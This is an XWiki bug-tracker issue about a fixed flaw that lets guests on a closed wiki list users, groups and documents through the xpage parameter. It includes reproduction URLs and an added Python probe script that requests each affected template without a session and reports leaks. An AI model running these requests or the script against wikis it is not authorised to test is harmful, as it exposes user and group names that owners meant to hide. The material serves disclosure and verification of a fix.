Details
- Type: Bug
- Resolution: Fixed
- Priority: Minor
- Affects Version/s: 8.4.5, 10.11.8, 11.3.1, 13.6-rc-1
- Unit
- Low
- Hard
- N/A
- N/A
-
Description
An unauthenticated user can retrieve the list of users through a publicly accessible URL.
Note: the data leak only applies to a closed wiki on which specific rights have been granted so that the ForgotUsername/ResetPassword pages remain usable.
Note: a "closed wiki" is one where "Prevent unregistered users from viewing pages, regardless of the page rights" is checked in the User section of the administration (XWiki.XWikiPreference.authenticate_view = true).
To reproduce, access one of the following URLs as a guest:
<server>/xwiki/bin/get/XWiki/ForgotUsername?xpage=getdocuments&childrenOf=XWiki&exclude=XWiki.ForgotUsername&queryFilters=unique,hidden&offset=1&limit=100&reqNo=2
<server>/xwiki/bin/get/XWiki/ResetPassword?xpage=getdocuments&childrenOf=XWiki&exclude=XWiki.ResetPassword&queryFilters=unique,hidden&offset=1&limit=100&reqNo=2
<server>/xwiki/bin/login/XWikiLogin?xpage=getdocuments&limit=10000
Note: the ForgotUsername/ResetPassword URLs above are no longer accessible, but the issue still holds for XWikiLogin and needs to be solved in a general way.
I managed to make them inaccessible by removing the XWikiGuest user from the objects of these pages:
- <server>/xwiki/bin/edit/XWiki/ResetPassword
- <server>/xwiki/bin/edit/XWiki/ForgotUsername
But this makes Reset Password / Forgot Username unusable.
Note that this issue is not specific to the ResetPassword / ForgotUsername pages: any page of the wiki that is viewable by the guest user can be used as the entry point, because the template is selected by the xpage parameter rather than by the page itself.
In addition to getdocuments used in the examples above, the following templates could be abused in the same way and have been fixed accordingly:
- getdeleteddocuments.vm
- getgroupmembers.vm
- getgroups.vm
- getusers.vm
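A small unauthenticated probe for the five templates named above, written here as an added example (it is not XWiki project code and not part of the original issue). It builds the xpage URLs in the same shape as the reproduction steps, fetches each one without any session cookie, and classifies the answer. The response shape it parses (livetable-style JSON with "returnedrows" and "rows" keys, rows carrying a "doc_fullName") is an assumption, and the sample responses in the block are constructed for the offline test; the entry page XWiki/XWikiLogin and the "get" action are taken from the reproduction URLs.

```python
"""Probe an XWiki instance as an unauthenticated client for template-based listing leaks.

Added example, not XWiki code. Assumptions (not stated in the issue):
  - affected templates answer with livetable-style JSON ("returnedrows", "rows");
  - a closed wiki that is fixed answers either with an empty row set, a 401/403,
    or an HTML login page instead of JSON.
"""
import json
import sys
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Templates listed in the issue as reachable through ?xpage=<name> on any guest-viewable page.
TEMPLATES = ("getdocuments", "getdeleteddocuments", "getgroupmembers", "getgroups", "getusers")


def build_probe_url(server, page="XWiki/XWikiLogin", template="getdocuments", limit=100):
    """Build a probe URL in the form used by the issue's reproduction steps (get action)."""
    query = urlencode({"xpage": template, "limit": limit, "offset": 1, "reqNo": 1})
    return f"{server.rstrip('/')}/xwiki/bin/get/{page}?{query}"


def classify(status, body):
    """Classify one probe answer: 'leak', 'empty', 'denied' or 'unknown'."""
    if status in (401, 403):
        return "denied"
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body)
    except ValueError:
        return "unknown"  # not JSON, e.g. an HTML login form served to guests
    if not isinstance(data, dict):
        return "unknown"
    rows = data.get("rows") or []
    returned = int(data.get("returnedrows") or 0)
    # Any row handed to a guest is a leak: on a closed wiki a guest may view nothing.
    return "leak" if rows or returned > 0 else "empty"


def _http_fetch(url):
    """Fetch without cookies or credentials, i.e. exactly as the XWikiGuest user."""
    req = Request(url, headers={"Accept": "application/json"})
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(server, page="XWiki/XWikiLogin", templates=TEMPLATES, fetch=None):
    """Probe every template on the given page; `fetch` is injectable for offline use."""
    fetch = fetch or _http_fetch
    return {tpl: classify(*fetch(build_probe_url(server, page, tpl))) for tpl in templates}


# Constructed sample answers (not captured from a real instance) used for the offline run.
SAMPLE_LEAK = json.dumps({
    "reqNo": 1, "totalrows": 2, "returnedrows": 2, "offset": 1,
    "rows": [{"doc_fullName": "XWiki.Alice"}, {"doc_fullName": "XWiki.Bob"}],
})
SAMPLE_EMPTY = json.dumps({"reqNo": 1, "totalrows": 0, "returnedrows": 0, "offset": 1, "rows": []})


def _offline_fetch(url):
    """Simulate an unfixed instance: every listing template answers with rows."""
    return 200, SAMPLE_LEAK


if __name__ == "__main__":
    # With a server argument the probe runs for real; without one it uses the samples.
    target = sys.argv[1] if len(sys.argv) > 1 else "https://wiki.example"
    fetcher = None if len(sys.argv) > 1 else _offline_fetch
    for name, verdict in probe(target, fetch=fetcher).items():
        print(f"{name:22s} {verdict}")
```

Run it against a closed wiki with no session: any template reported as "leak" means a guest is being handed document, user or group names the closed-wiki setting was meant to hide; "empty" or "denied" is the expected post-fix behaviour, and "unknown" usually means the guest was redirected to the login form.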
Issue Links
- causes
  - XWIKI-19755 Changing the pagination page when all the results are already fetched empties the livetable (Closed)
- depends on
  - XWIKI-11205 If view rights are not allowed for guest users then ResetPassword doesn't work (Closed)
- is related to
  - XWIKI-18851 Unauthenticated user can retrieve user information through getdeleteddocuments.vm (Closed)
  - XWIKI-16610 Forgot Username and Reset Password are not available in closed wiki (Closed)
- relates to
  - XWIKI-18849 Private user data are accessible through suggest.vm (Closed)
  - XWIKI-18851 Unauthenticated user can retrieve user information through getdeleteddocuments.vm (Closed)
  - XWIKI-9069 Private document name leak in document index (Closed)
  - XWIKI-18768 Copy and delete actions are proposed to the user even when she can't perform them (Closed)
  - XWIKI-18850 Unauthenticated user can retrieve the list of users through uorgsuggest.vm (Closed)
  - XWIKI-9649 Don't display not viewable documents in livetable (Open)